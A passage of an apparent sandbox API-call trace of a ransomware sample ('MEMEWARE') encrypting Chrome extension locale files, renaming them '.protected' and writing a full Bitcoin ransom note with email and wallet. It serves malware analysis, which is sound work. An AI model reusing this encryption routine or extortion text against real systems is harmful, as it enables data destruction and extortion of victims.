HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.protected") returned 165 [0081.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.protected")) returned 1 [0081.515] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.515] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.515] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0081.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0081.515] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.515] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.516] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.516] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.516] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.516] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.516] CloseHandle (hObject=0x164) returned 1 [0081.516] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0081.516] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0081.516] wnsprintfW (in: 
pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned 141 [0081.516] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0081.516] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0081.516] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*") returned 143 [0081.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.516] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.516] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.517] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.517] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.517] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\.") returned 143 [0081.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.517] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.517] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.517] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.517] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.517] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.517] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\..") returned 144 [0081.517] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.517] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.517] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.517] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.517] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.517] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.517] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.517] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.517] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.518] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.518] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json") returned 155 [0081.518] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.518] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0081.518] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.518] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0081.518] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.518] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.519] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.519] CloseHandle (hObject=0x168) returned 1 [0081.519] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.protected") returned 165 [0081.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.protected")) returned 1 [0081.519] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.519] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.519] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\RESTORE_FILES.txt") returned 159 [0081.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.520] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.520] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.520] lstrlenA (lpString="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") returned 684 [0081.520] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.520] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.520] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.520] CloseHandle (hObject=0x164) returned 1 [0081.521] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1="se", lpString2="Program Files") returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="Program Files (x86)") returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1="se", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned 141 [0081.521] lstrcmpW (lpString1="se", lpString2=".") returned 1 [0081.521] lstrcmpW (lpString1="se", lpString2="..") returned 1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*") returned 143 [0081.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.521] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.521] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.521] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\.") returned 143 [0081.521] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.521] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.521] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.521] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.521] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\..") returned 144 [0081.521] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.521] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.521] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.521] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.521] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") 
returned 155 [0081.521] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.521] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0081.522] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0081.522] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.522] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json") returned 155 [0081.522] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.522] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.523] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.523] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd2, lpOverlapped=0x0) returned 1 [0081.523] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.523] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.523] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.523] CloseHandle (hObject=0x168) returned 1 [0081.523] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.protected") returned 165 [0081.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\messages.json.protected")) returned 1 [0081.523] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.524] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.524] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\RESTORE_FILES.txt") returned 159 [0081.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 